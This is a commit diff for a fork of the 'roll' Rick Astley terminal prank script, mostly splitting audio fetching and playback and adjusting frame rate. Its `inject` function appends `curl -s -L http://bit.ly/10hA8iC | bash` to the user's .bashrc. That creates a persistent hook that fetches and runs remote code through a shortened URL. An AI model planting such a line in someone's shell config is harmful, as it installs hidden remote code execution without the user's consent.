Update `roll` script
bump version to 0.12 because why not

 - Seperate get_audio and play_audio.
 - Add comment for obscure `trap` commands.
 - Increase FPS to 28 for better Audio/Video sync.
 - Other...

diff --git a/roll b/roll
--- a/roll
+++ b/roll
@@ -1,31 +1,29 @@
-#!/bin/env bash
+#!/usr/bin/bash
+
 # Rick Astley in your Terminal.
 # By Serene and Justine Tunney <3
 # 4yman-0's fork
 
-version='0.11'
+version='0.12'
 rick='https://keroserene.net/lol'
 video="$rick/astley80.full.bz2"
 audio_gsm="$rick/roll.gsm"
 audio_raw="$rick/roll.s16"
 audpid=0
 
-NEVER_GONNA='curl -s -L http://bit.ly/10hA8iC | bash'
-MAKE_YOU_CRY="$HOME/.bashrc"
-
 red='\x1b[38;5;9m'
 yell='\x1b[38;5;216m'
 green='\x1b[38;5;10m'
 purp='\x1b[38;5;171m'
 
-echo -en '\x1b[s'  # Save cursor.
-
+# helper functions
 has (){ command -v $1 &> /dev/null; }
 cleanup (){ (( audpid > 1 )) && kill $audpid 2>/dev/null; }
 quit (){ echo -e "\x1b[2J \x1b[0H ${purp}<3 \x1b[?25h \x1b[u \x1b[m"; }
 
-trap "cleanup" INT
-trap "quit" EXIT
+# Run quit/cleanup after getting INT/EXIT
+trap 'cleanup' INT
+trap 'quit' EXIT
 
 usage (){
 echo -en "\
@@ -38,6 +36,9 @@ ${purp}OPTIONS: $yell
 }
 
 inject (){
+  local NEVER_GONNA='curl -s -L http://bit.ly/10hA8iC | bash'
+  local MAKE_YOU_CRY="$HOME/.bashrc"
+
   echo -en "$red[Inject] "
   echo $NEVER_GONNA >> $MAKE_YOU_CRY
   echo -e "${green}Appended to $MAKE_YOU_CRY."
@@ -61,30 +62,35 @@ gimme() {
   else echo "Cannot has internets. :("; exit
   fi
 }
-echo -en "\x1b[?25l \x1b[2J \x1b[H"  # Hide cursor, clear screen.
 
 get_video (){
   echo -e "${yell}Give me video"
   [ -f /tmp/roll.bz2 ] || gimme $video >/tmp/roll.bz2
 }
 
-get_play_audio (){
+get_audio (){
   echo -e "${yell}Give me audio"
+  if has afplay || has aplay; then
+    [ -f /tmp/roll.s16 ] || gimme $audio_raw >/tmp/roll.s16
+  elif has play; then
+    [ -f /tmp/roll.gsm.wav ] || gimme $audio_gsm >/tmp/roll.gsm.wav
+  fi
+}
+
+play_audio (){
   if has afplay; then
     # On Mac OS, if `afplay` available, pre-fetch compressed audio.
-    [ -f /tmp/roll.s16 ] || gimme $audio_raw >/tmp/roll.s16
     afplay /tmp/roll.s16 &
 
   elif has aplay; then
     # On Linux, if `aplay` available, stream raw sound.
-    [ -f /tmp/roll.s16 ] || gimme $audio_raw >/tmp/roll.s16
     aplay -q -f S16_LE -r 16000 /tmp/roll.s16 &
 
   elif has play; then
-    # On Cygwin, if `play` is available (via sox), pre-fetch compressed audio.
-    [ -f /tmp/roll.gsm.wav ] || gimme $audio_gsm >/tmp/roll.gsm.wav
+    # On Cygwin, if `play` is available (via sox), play compressed audio.
     play -q /tmp/roll.gsm.wav &
   fi
+
   audpid=$!
 }
 
@@ -96,7 +102,7 @@ play_video (){
   $PY <(cat <<EOF
 import sys
 import time
-fps = 25; time_per_frame = 1.0 / fps
+fps = 28; time_per_frame = 1.0 / fps
 buf = ''; frame = 0; next_frame = 0
 begin = time.time()
 try:
@@ -117,6 +123,9 @@ EOF
   ) < <(bunzip2 /tmp/roll.bz2 -dc -q 2)
 }
 
+# echo -en '\x1b[s'  # Save cursor.
+echo -en "\x1b[?25l \x1b[2J \x1b[H" # Hide cursor, clear screen.
 get_video
-get_play_audio
+get_audio
+play_audio
 play_video
